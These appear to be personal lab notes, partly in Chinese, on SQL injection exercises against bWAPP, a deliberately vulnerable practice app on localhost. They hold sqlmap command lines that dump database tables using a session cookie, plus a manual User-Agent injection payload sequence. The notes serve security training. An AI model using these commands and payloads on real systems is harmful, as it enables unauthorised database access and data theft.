SQL Injection (GET/Search)
C:\Python27\sqlmap>python sqlmap.py -u "http://localhost/bwapp/sqli_1.php?titl
e=sfsdf&action=search" --cookie="PHPSESSID=k60mg7l865e7l5jrp9gr8l6c84;security_level=0" --dbms=mysql --batch -D bwapp -T movies -C "title,id" --dump
sql post
C:\Python27\sqlmap>python sqlmap.py -u "http://localhost/bwapp/sqli_6.php" --
data="title=sdfsdf&action=search" --cookie="PHPSESSID=k60mg7l865e7l5jrp9gr8l6c8
4;security_level=0" --dbms=mysql --batch --current-db
SQL Injection (AJAX/JSON/jQuery)-- 待分析 。
====================================================
SQL Injection - Stored (User-Agent)
可以看出是用的ua 字段。 通过bs 修改ua 可以看出修改的结果。
然后将ua 修改为 ‘ ,出现错误, 出现注入点。
修改 为 ', 'sdfsdf')# ok
修改 第二个参数为 select 语句,得到注入结果。